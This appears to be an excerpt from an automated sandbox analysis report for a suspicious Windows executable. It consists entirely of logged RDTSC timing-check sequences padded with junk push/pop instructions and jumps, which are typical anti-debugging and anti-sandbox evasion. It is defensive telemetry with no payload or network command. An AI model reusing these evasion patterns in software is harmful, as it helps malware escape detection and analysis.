Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9AE97 second address: F9AEC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jp 00007FAD4CB4B576h 0x0000000b jns 00007FAD4CB4B576h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push edx 0x00000018 jmp 00007FAD4CB4B57Bh 0x0000001d pop edx 0x0000001e jc 00007FAD4CB4B57Eh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9AEC3 second address: F9AEE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAD4CB7C007h 0x0000000d jno 00007FAD4CB7BFF6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9B340 second address: F9B350 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAD4CB4B576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9B491 second address: F9B49B instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAD4CB7BFF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9B49B second address: F9B4A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FAD4CB4B576h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9B4A9 second address: F9B4AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9B4AF second address: F9B4BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9B4BB second address: F9B4BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9B4BF second address: F9B4F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B57Ah 0x00000007 jmp 00007FAD4CB4B57Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007FAD4CB4B585h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9B63E second address: F9B648 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9EB12 second address: F9EB2D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FAD4CB4B576h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FAD4CB4B57Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9EC80 second address: F9EC84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9EDFA second address: F9EE13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD4CB4B585h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9EE13 second address: F9EE32 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAD4CB7BFF6h 0x00000008 jmp 00007FAD4CB7C002h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9EE32 second address: F9EE3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9EE3E second address: F9EE4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FAD4CB7BFF6h 0x0000000a popad 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9EE4E second address: F9EE5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007FAD4CB4B576h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9EE5B second address: F9EE75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C004h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9EE75 second address: F9EE79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9EE79 second address: F9EE7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FA4990 second address: FA49BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 je 00007FAD4CB4B576h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jnc 00007FAD4CB4B576h 0x0000001a jmp 00007FAD4CB4B57Fh 0x0000001f popad 0x00000020 push ebx 0x00000021 pushad 0x00000022 popad 0x00000023 pop ebx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FA3B20 second address: FA3B2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAD4CB7BFFAh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FA3B2F second address: FA3B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FA3C96 second address: FA3CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 jng 00007FAD4CB7BFF6h 0x0000000d push edi 0x0000000e pop edi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FA3CAE second address: FA3CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FA3CB2 second address: FA3CB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FA3CB6 second address: FA3CC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FA42F5 second address: FA42FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FA42FD second address: FA4302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FA4475 second address: FA447A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FAB8E8 second address: FAB8EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FABA26 second address: FABA2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FABA2A second address: FABA45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FAD4CB4B582h 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FABCFB second address: FABCFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FABCFF second address: FABD1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007FAD4CB4B583h 0x0000000c pop edx 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FABD1D second address: FABD23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FAC03D second address: FAC041 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FACE2E second address: FACE57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FAD4CB7BFFDh 0x0000000e jmp 00007FAD4CB7C002h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FAD128 second address: FAD12C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FAD12C second address: FAD146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007FAD4CB7BFF6h 0x0000000d jp 00007FAD4CB7BFF6h 0x00000013 js 00007FAD4CB7BFF6h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FAD146 second address: FAD152 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAD4CB4B57Eh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FB14D0 second address: FB14D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FB14D4 second address: FB14DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FB06BD second address: FB06C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FB086E second address: FB087E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FAD4CB4B57Eh 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FB087E second address: FB088C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnc 00007FAD4CB7BFF6h 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FB09B0 second address: FB09BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jnl 00007FAD4CB4B576h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FB0C5E second address: FB0C62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FB0C62 second address: FB0C77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B57Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FB0DB8 second address: FB0DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FB0DC0 second address: FB0DCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007FAD4CB4B576h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FB0DCD second address: FB0DD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBFE3A second address: FBFE40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBFE40 second address: FBFE46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBFE46 second address: FBFE82 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FAD4CB4B582h 0x0000000c jmp 00007FAD4CB4B57Ah 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jbe 00007FAD4CB4B58Ch 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 pop edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBFE82 second address: FBFE99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAD4CB7C000h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBDFD8 second address: FBDFDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBDFDE second address: FBDFE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBE14F second address: FBE159 instructions: 0x00000000 rdtsc 0x00000002 je 00007FAD4CB4B57Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBE443 second address: FBE459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FAD4CB7C001h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBE5A2 second address: FBE5C6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jng 00007FAD4CB4B576h 0x0000000d pop esi 0x0000000e pushad 0x0000000f jmp 00007FAD4CB4B583h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBE6DD second address: FBE6EA instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAD4CB7BFF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBE6EA second address: FBE705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jns 00007FAD4CB4B576h 0x0000000c jl 00007FAD4CB4B576h 0x00000012 popad 0x00000013 jp 00007FAD4CB4B582h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBE705 second address: FBE70B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBE831 second address: FBE84E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD4CB4B589h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBE84E second address: FBE852 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBE852 second address: FBE85C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBE85C second address: FBE879 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C009h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBEB4B second address: FBEB4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBECC4 second address: FBECC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBECC8 second address: FBECD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD4CB4B57Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBFCB6 second address: FBFCC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 je 00007FAD4CB7BFF6h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBFCC8 second address: FBFCE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FAD4CB4B58Bh 0x0000000b jmp 00007FAD4CB4B57Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FC6397 second address: FC639C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FC639C second address: FC63B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD4CB4B57Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FAD4CB4B576h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FC63B6 second address: FC63BC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FC5D58 second address: FC5D5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FC5D5E second address: FC5D72 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAD4CB7BFF6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007FAD4CB7C002h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FC5D72 second address: FC5D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FC5D78 second address: FC5DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FAD4CB7C009h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAD4CB7BFFAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FD7AFF second address: FD7B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD4CB4B586h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FD7B20 second address: FD7B24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FD7659 second address: FD7667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FD7667 second address: FD76A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FAD4CB7BFF6h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FAD4CB7C004h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 jng 00007FAD4CB7C00Fh 0x0000001a jmp 00007FAD4CB7C003h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FD7810 second address: FD781A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FD781A second address: FD7827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FD7827 second address: FD783D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007FAD4CB4B576h 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FE3BEA second address: FE3BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FE698C second address: FE69A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAD4CB4B586h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FE69A9 second address: FE69AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FE67F9 second address: FE67FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FEF62D second address: FEF631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FEF8E7 second address: FEF8ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
